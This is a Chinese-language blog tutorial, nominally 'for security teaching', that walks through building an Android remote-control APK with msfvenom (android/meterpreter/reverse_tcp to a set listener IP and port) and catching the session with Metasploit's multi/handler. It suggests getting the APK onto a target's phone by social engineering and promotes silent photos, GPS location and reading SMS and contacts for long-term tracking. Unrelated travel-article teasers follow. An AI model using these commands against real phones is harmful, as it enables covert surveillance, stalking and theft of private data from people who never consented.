用于网络安全教学,切勿用于不当目的!
大多数情况下,安卓手机在安装了恶意程序后,或多或少都会被远控,那么攻击者在后台通过指令获取目标安卓手机的远程静默拍照、录像、录音、定位、获取通讯录和短信真的是不在话下了,下文我们就来探讨下这种技术。
Msfvenom
Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。
比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的方法。
生成安卓远控
- kali终端下输入:
msfvenom -h 查看使用帮助
其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)
msfvenom -l payloads
msfvenom -l formats
- 生成远控的完整命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk
这里没有使用-f参数,生成安卓可执行程序,可以不用。
- 部署可执行程序
将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。
使用metasploit进行监听
启动msf
Kali终端下输入:msfconsole
继续输入:
use exploit/multi/handler
本模块专门用于设置独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。
为该模块设置参数:
show options
set LHOST 192.168.31.111
set lport 8888
这里的设置必须和前面用msfvenom的设置保持一致。
run
执行侦听,等待上线
- 得到meterpreter会话
一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。
输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:
远程拍照:目标手机不会有任何察觉,属于后台系统拍照;
gps定位:直接显示经纬度地理位置,非常精准;
查看短信与通讯录;
由于平台原因,就不明示写出命令了。如需完整学习安卓嘿客,请进入我头条主页,找到相应专栏加入学习吧!
推荐阅读:外卖
-
以下6个景点节假日不要去,除了人,什么都没有
时代在发展,经济也在发展,国家繁荣昌盛,随之我们的生活水平也不断的在提高!随着生活水平的提高,我们也学会了享受生活,在日常工作的忙碌之余,选择了旅游,从而释放压...
2020-02-18 -
坐酷航是一种怎样的体验?座椅舒适机餐美味 怕
说到廉价航空公司,你的脑海里第一个出现的是哪家?亚洲航空,还是春秋航空?对于经常国内和东南亚旅行的人应该比较熟悉这两家,但事实上,全世界的廉价航空非常多。有的航...
2020-02-18 -
三亚最美沿海公路,绵延海岸十几公里,是多数游
如果你来三亚选择自驾旅行,那么从机场前往市区,建议走海虹路再转入 三亚湾 路,这是一段沿着海边的公路,风景非常不错。开着车往市区方向行驶,此刻你的右边就是碧海蓝...
2020-02-18 -
传说俄罗斯美女如云,来了俄罗斯才知道,别活在
俄罗斯是一个非常有魅力的国家,这个国家也在大力的发展旅游业,中国游客也特别喜欢去俄罗斯旅游,来到俄罗斯之后,大家也会发现可以观察到很多具有俄罗斯风格的建筑,比如...
2020-02-18 -
老外到中国旅游,看到中国式结账感到惊讶,网友
对于外国人来说,中国是一个充满神秘和魅力的国家,无论是长达五千年的文化和历史,还是现代化的发展和变革,中国总能在一段时间内,创造出令人瞠目结束的硕果。也正是这样...
2020-02-18 -
BBC专业测评告诉你,奢华酒店为什么这么贵
今天大师兄为大家推荐一部酒店控们必看的BBC纪录片《Amazing Hotels: Life Beyond The Lobby》(中文译名:《奇妙酒店:大堂之外...
2020-02-18